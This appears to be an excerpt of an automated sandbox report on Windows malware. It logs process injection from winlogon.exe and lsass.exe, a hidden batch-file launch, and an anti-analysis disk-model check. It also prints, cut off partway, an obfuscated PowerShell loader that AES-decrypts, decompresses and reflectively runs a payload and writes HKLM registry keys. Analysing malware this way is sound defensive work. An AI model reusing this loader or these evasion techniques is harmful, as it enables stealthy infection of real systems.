        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E00000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2BE0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 29A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 8A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DD0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2940000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DE0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 3010000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 7C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2880000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 3070000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2C90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C50000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2A50000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BD0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 10D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2C30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2D70000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C70000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1110000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: D20000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2A40000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2870000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1030000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C50000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 12E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2660000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BE0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 29B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2F90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1380000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 15E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 15D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2360000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 21D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 800000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2BA0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DA0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 800000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: F20000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2CF0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E40000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 26B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1320000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1320000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: F70000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2D60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1540000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: D90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: CC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 21F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C20000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: AD0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2B30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 24A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E20000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 6E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2260000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EF0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: B80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: AE0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 28E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\cmd.exe base: 1D54F9D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 281B7B90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D204D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\more.com base: 1F66CF40000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 220C2280000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 220C22B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 170A7FA0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 29E3CD50000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8811D0000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1C872570000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1C872840000Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" wjzJMHoFZaIaceAGUG "Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6ieX6iAI6iQp6iH6iXC6iI6iSA6iu6ir6iB6ic6iL6i+6icB6i4j6i66iW6il6i4f6irm6ib6i76i/6i66ihB6ig6ir6iJ6iH6i26icK6iI6i=");'.Replace('6i', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$TaCK.pJIVpJ=[pJSypJspJtepJmpJ.CpJopJnpJvpJepJrpJtpJ]:pJ:FpJrpJopJmpJBapJsepJ6pJ4pJSpJtpJripJnpJgpJ("pJLypJW7pJocpJepJGopJ3pJ6XpJZpJlpJqpJrpJEpJEpJ5xpJlQpJ=pJ=");'.Replace('pJ', ''); $HzNF=$TaCK.CreateDecryptor(); $gTTC=$HzNF.TransformFinalBlock($vrVB, 0, $vrVB.Length); $HzNF.Dispose(); $TaCK.Dispose(); $gTTC;}function ppFM($vrVB){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$BYbD=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw(,$vrVB);'.Replace('uw', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$aohN=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw;'.Replace('uw', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$rQYH=QuNeQuw-QuObQujQuecQutQu SQuyQusQutQueQumQu.QuIOQu.CQuoQumQupQureQussQuiQuoQunQu.QuGZQuiQupQuSQutQurQueaQum($BYbD, Qu[IQuO.QuCoQumQuprQueQussQuiQuoQunQu.QuCQuoQumpQureQusQusQuiQuonQuMoQudQueQu]Qu:Qu:DQueQucQuoQumQupQureQusQus);'.Replace('Qu', ''); $rQYH.CopyTo($aohN); $rQYH.Dispose(); $BYbD.Dispose(); $aohN.Dispose(); $aohN.ToArray();}function QIGO($vrVB,$BCHx){ Invoke-Expression -Verbose -WarningAction Inquire '$lHpd=oR[SoRysoRteoRmoR.RoReoRfloReoRcoRtoRioRooRnoR.AoRssoReoRmoRboRlyoR]:oR:oRLoRooRaoRd([byte[]]$vrVB);'.Replace('oR', ''); Invoke-Expression -Debug -WarningAction Inquire '$AEjb=$lHpd.OBEnOBtrOByPOBoOBinOBt;'.Replace('OB', ''); Invoke-Expression -Debug '$AEjbR9.IR9nvR9okR9eR9($R9nR9ulR9lR9, $BCHx);'.Replace('R9', '');}function ZAB($lYat){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'vcKCVWMMyKQFoeskiSq;mNFaDYQRq;OvWrknEdQ'; Set-ItemProperty -Path $registryPath -Name 'vcKCVWMJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfileJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\more.com moreJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\findstr.exe "C:\Windows\system32\findstr.exe" /i WDS100T2B0AJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((get-wmiobject win32_diskdrive | select-object -expandproperty model | findstr /i 'wds100t2b0a') -and (-not (get-childitem -path f:\ -recurse | where-object { -not $_.psiscontainer } | measure-object).count)) {exit 900} else {exit 1}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function cuof($vrvb){ invoke-expression -verbose -debug '$tack=35[s35ys35te35m35.s35e35cu35r35i35t35y35.35c35ry35pt35o35g35r35ap35hy35.35a35e35s35]:35:35c35r35e35a35te35(35);'.replace('35', ''); invoke-expression -informationaction ignore '$tack.3smo3sde3s=[3ss3sys3st3sem3s.3ss3se3sc3su3sr3sit3sy.3sc3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sc3si3sp3sh3se3srm3so3sde3s]3s:3s:3sc3sbc3s;'.replace('3s', ''); invoke-expression -verbose -debug -informationaction ignore '$tack.srpasrddsrinsrgsr=[srssryssrtsresrmsr.srssresrcusrrisrtsrysr.srcrsrypsrtsrosrgsrrsrapsrhsrysr.srpsrasrddsrisrngsrmsrosrdsresr]:sr:srpsrksrcsrssr7;'.replace('sr', ''); invoke-expression -warningaction inquire -informationaction ignore '$tack.6ike6iy=6i[s6iy6ist6ie6im.6ic6io6in6iv6ie6ir6it]6i::6if6ir6io6imb6ias6ie6i66i46is6itr6ii6in6ig6i("6iex6iai6iqp6ih6ixc6ii6isa6iu6ir6ib6ic6il6i+6icb6i4j6i66iw6il6i4f6irm6ib6i76i/6i66ihb6ig6ir6ij6ih6i26ick6ii6i=");'.replace('6i', ''); invoke-expression -warningaction inquire -debug -informationaction ignore -verbose '$tack.pjivpj=[pjsypjspjtepjmpj.cpjopjnpjvpjepjrpjtpj]:pj:fpjrpjopjmpjbapjsepj6pj4pjspjtpjripjnpjgpj("pjlypjw7pjocpjepjgopj3pj6xpjzpjlpjqpjrpjepjepj5xpjlqpj=pj=");'.replace('pj', ''); $hznf=$tack.createdecryptor(); $gttc=$hznf.transformfinalblock($vrvb, 0, $vrvb.length); $hznf.dispose(); $tack.dispose(); $gttc;}function ppfm($vrvb){ invoke-expression -informationaction ignore -warningaction inquire -debug '$bybd=uwneuww-uwobuwjuwecuwtuw suwyuwsuwtuweuwmuw.uwiouw.muweuwmuwouwryuwstuwruweuwauwmuw(,$vrvb);'.replace('uw', ''); invoke-expression -informationaction ignore -warningaction inquire -debug -verbose '$aohn=uwneuww-uwobuwjuwecuwtuw suwyuwsuwtuweuwmuw.uwiouw.muweuwmuwouwryuwstuwruweuwauwmuw;'.replace('uw', ''); invoke-expression -warningaction inquire -debug -informationaction ignore '$rqyh=qunequw-quobqujquecqutqu squyqusqutquequmqu.quioqu.cquoqumqupqurequssquiquoqunqu.qugzquiqupqusqutqurqueaqum($bybd, qu[iquo.qucoqumquprquequssquiquoqunqu.qucquoqumpqurequsqusquiquonqumoqudquequ]qu:qu:dquequcquoqumqupqurequsqus);'.replace('qu', ''); $rqyh.copyto($aohn); $rqyh.dispose(); $bybd.dispose(); $aohn.dispose(); $aohn.toarray();}function qigo($vrvb,$bchx){ invoke-expression -verbose -warningaction inquire '$lhpd=or[sorysorteormor.roreorfloreorcortorioroornor.aorssoreormorborlyor]:or:orlorooraord([byte[]]$vrvb);'.replace('or', ''); invoke-expression -debug -warningaction inquire '$aejb=$lhpd.obenobtrobypoboobinobt;'.replace('ob', ''); invoke-expression -debug '$aejbr9.ir9nvr9okr9er9($r9nr9ulr9lr9, $bchx);'.replace('r9', '');}function zab($lyat){ $registrypath = 'hklm:\software\oohhhm='; if (test-path $registrypath) { remove-itemproperty -path $registrypath -name * -force } else { new-item -path $registrypath -force; } set-itemproperty -path $registrypath -name 'map' -value 'vckcvwmmykqfoeskisq;mnfadyqrq;ovwrknedq'; set-itemproperty -path $registrypath -name 'vckcvwm
